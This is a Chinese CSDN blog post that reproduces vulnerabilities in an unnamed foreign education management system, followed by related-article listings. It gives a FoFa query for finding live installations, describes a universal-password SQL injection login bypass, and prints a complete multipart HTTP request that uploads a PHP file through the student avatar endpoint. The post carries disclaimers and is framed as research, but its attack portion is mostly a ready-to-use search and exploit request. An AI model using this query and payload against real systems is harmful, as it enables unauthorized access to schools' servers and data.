【漏洞复现】国外某教育系统SQL注入和文件上传漏洞

已于 2024-01-31 15:11:26 修改
阅读量437 收藏 9
点赞数 11
分类专栏: 漏洞复现 文章标签: web安全 安全 网络安全
于 2024-01-31 15:09:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KKleeeaa/article/details/135954124
版权

声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

0x01:FoFa语句

"admin/vendors/jGrowl/jquery.jgrowl.css"

0x02:SQL注入漏洞点

漏洞点的话是在登录页面,存在一个万能密码绕过的一个情况,账户输入我图片一样的,然后密码随便输入我输入的12345哈哈。。

图片

然后神奇的一幕就出现了

图片

成功用万能密码进入到后台内部。。。

这个国外的系统也太辣坤了八

0x03:文件上传漏洞点

文件上传点的话是在admin/uploads/下面,自行看着办。

图片

文件上传POC


POST /student_avatar.php?change HTTP/1.1
Host: 
Content-Length: 202
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydAPjrmyKewWuf59H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.3611
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
Connection: close

------WebKitFormBoundarydAPjrmyKewWuf59H
Content-Disposition: form-data; name="image"; filename="c1.php"
Content-Type: image/jpg

<?php phpinfo();?>
------WebKitFormBoundarydAPjrmyKewWuf59H--

搞个phpinfo就可以了证明危害即可!!!!!!

小编提示:未经授权的渗透测试属于违法行为!!!!

还没有进群的朋友们抓紧进群,群里面有很多渗透测试工具以及资料。

图片

Aniya也会哭
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现国外教育系统 Sql注入+任意文件上传
失心少年
12-07 508
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!这是一款国外用的教学管理软件,用户登录处未对用户提交的数据进行处理,从而早成sql注入。登录成功后,在头像处可以上传任意文件,getshell。万能密码 有些注入是再账号,有些是在密码,均可以试试。
漏洞复现】挂号系统-SQL注入-login
知黑而守白
07-05 67
挂号系统是医疗服务中不可或缺的一部分,旨在提高就医效率和优化资源配置。该系统通过线上或线下方式,如互联网、自助挂号机、电话等,为患者提供便捷的挂号服务。患者或家属可以随时随地预约挂号,节省了大量时间和精力。同时,挂号系统还提供了医生的排班信息、号源情况等,使患者能够更清楚地了解医疗资源情况。此外,挂号系统还采用了多种技术手段,如指纹识别、生物特征匹配等,以抑制非法倒号行为,保护患者的合法权益。总之,挂号系统是医疗服务信息化、智能化的重要体现,为患者提供了更加便捷、高效的医疗服务。
漏洞复现】用友NC Cloud系统queryPsnInfo接口SQL注入
今天是几号的博客
08-05 695
在受影响的版本中,攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口,利用 staffid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
漏洞复现】用友NC querygoodsgridbycode 前台SQL注入漏洞
今天是几号的博客
07-26 709
用友NC是由用友公司开发的一套面向大型企业和集团型企业的管理软件产品系列。这一系列产品基于全球最新的互联网技术、云计算技术和移动应用技术,旨在帮助企业创新管理模式、引领商业变革。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
漏洞复现】泛微SQL注入漏洞
失心少年
07-26 316
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!该系统存在post注入。
漏洞复现】任我行CRM SmsDataList Sql注入
凝聚力安全团队
07-17 376
任我行CRM(Customer Relationship Management)是一款专业的企业级CRM软件,旨在帮助企业有效管理客户关系、提升销售效率和提供个性化的客户服务。
漏洞复现】某数字化餐饮服务系统SQL注入
失心少年
07-25 354
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!该系统存在多处sql注入点,可获取敏感信息。
【1day】复现泛微OA某版本SQL注入漏洞
记录并分享学习安全的知识点..
08-21 625
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微OA存在SQL注入漏洞,攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。
漏洞复现】用友 时空KSOA imagefield SQL注入漏洞
凝聚力安全团队
07-16 500
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友 时空KSOA imagefield 接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
CSZ CMS 1.2.X sql注入漏洞
09-07
CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS ...
红帆OA(医疗版)漏洞细节未授权SQL注入请求注入数据包
05-06
#### 二、SQL注入漏洞详解 SQL注入是一种常见的安全漏洞,攻击者通过将恶意SQL代码插入到应用程序的输入字段中,从而操纵数据库执行非预期的操作。红帆OA(医疗版)存在未授权SQL注入的风险,这可能导致敏感信息泄露...
PHPCMS2008广告模板SQL注入漏洞修复
10-21
PHPCMS2008是一款流行的开源内容管理系统,然而,如标题所示,它存在一个广告模板SQL注入漏洞,这个问题在2008年的版本中尤为突出。SQL注入是一种常见的网络安全威胁,允许攻击者通过操纵输入数据来执行恶意SQL命令...
网络安全(黑客)自学
白帽子凯哥聊黑客
08-20 695
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全(黑客)——自学2024
最新发布
2401_84466325的博客
08-21 1514
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
从密码学角度看网络安全:加密技术的最新进展
A526847的博客
08-20 610
在数字化时代,网络安全已成为不可忽视的重大问题。随着计算机技术和网络应用的飞速发展,黑客和网络攻击手段日益复杂,对个人、企业乃至国家的信息安全构成了严重威胁。密码学作为网络安全领域的核心支柱,其发展对于保护信息安全具有至关重要的作用。本文将探讨加密技术的最新进展,以及这些进展如何助力网络安全
网络安全】P2:访问控制失效
等风来
08-19 158
导致后面的任何功能都不需要电子邮件的验证,可能造成欺诈和伪造帐户、敏感信息泄露。
Web漏洞扫描与分析系统设计:SQL注入检测与防护
然后,论文介绍了使用Python语言设计的SQL注入漏洞扫描工具,该工具能帮助用户检测目标网站的安全性,并提供针对性的安全建议。此工具的实现强调了对普通用户的友好性,使得非专业人员也能进行基本的网络安全防护。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值